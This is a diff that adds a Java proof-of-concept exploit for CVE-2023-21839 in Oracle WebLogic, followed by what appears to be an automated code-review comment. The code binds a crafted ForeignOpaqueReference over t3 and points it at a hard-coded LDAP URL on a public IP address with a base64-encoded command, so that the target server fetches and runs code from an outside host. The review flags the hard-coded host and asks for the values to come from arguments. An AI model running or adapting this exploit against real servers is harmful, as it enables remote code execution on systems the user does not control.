1+ import javax .naming .Context ;
2+ import javax .naming .InitialContext ;
3+ import javax .naming .NamingException ;
4+ import java .lang .reflect .Field ;
5+ import java .util .Hashtable ;
6+ import java .util .Random ;
7+
8+ public class CVE_2023_21839 {
9+ static String JNDI_FACTORY ="weblogic.jndi.WLInitialContextFactory" ;
10+ static String HOW_TO_USE ="[*]exploit start" ;
11+
12+ private static InitialContext getInitialContext (String url )throws NamingException
13+ {
14+ Hashtable <String ,String > env = new Hashtable <String ,String >();
15+ env .put (Context .INITIAL_CONTEXT_FACTORY , JNDI_FACTORY );
16+ env .put (Context .PROVIDER_URL , url );
17+ return new InitialContext (env );
18+ }
19+ public static void main (String args []) throws Exception {
20+ if (args .length <2 ){
21+ System .out .println (HOW_TO_USE );
22+ System .exit (0 );
23+ }
24+ String t3Url = "localhost:7001" ;
25+ String ldapUrl = "ldap://124.222.21.138:1389/Basic/Command/base64/aWQgPiBDYWxj" ;
26+ InitialContext c =getInitialContext ("t3://" +t3Url );
27+ Hashtable <String ,String > env = new Hashtable <String ,String >();
28+ env .put (Context .INITIAL_CONTEXT_FACTORY , "com.sun.jndi.rmi.registry.RegistryContextFactory" );
29+ weblogic .deployment .jms .ForeignOpaqueReference f =new weblogic .deployment .jms .ForeignOpaqueReference ();
30+ Field jndiEnvironment =weblogic .deployment .jms .ForeignOpaqueReference .class .getDeclaredField ("jndiEnvironment" );
31+ jndiEnvironment .setAccessible (true );
32+ jndiEnvironment .set (f ,env );
33+ Field remoteJNDIName =weblogic .deployment .jms .ForeignOpaqueReference .class .getDeclaredField ("remoteJNDIName" );
34+ remoteJNDIName .setAccessible (true );
35+ remoteJNDIName .set (f ,ldapUrl );
36+ String bindName = new Random (System .currentTimeMillis ()).nextLong ()+"" ;
37+ try {
38+ c .bind (bindName ,f );
39+ c .lookup (bindName );
40+ }catch (Exception e ){ }
41+
42+ }
43+ }
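Review bot: The t3 endpoint and the LDAP URL in `main` are hard-coded, and the LDAP URL names a public address (`124.222.21.138`), so anyone who runs this against a lab WebLogic instance makes the server under test contact a host outside their control. The `args.length < 2` guard already demands two arguments that are never read; take both values from them, `String t3Url = args[0];` and `String ldapUrl = args[1];`, and leave only an obviously fake placeholder in the committed source. The empty `catch (Exception e){ }` around `bind`/`lookup` also discards the one result a patch-verification run needs, namely whether the server rejected the call, so the exception should at least be printed. `HOW_TO_USE` should describe the two expected arguments instead of printing "[*]exploit start", and a class comment should state that the file is a proof of concept for the CVE named in the class name, intended only for systems the tester is authorised to assess.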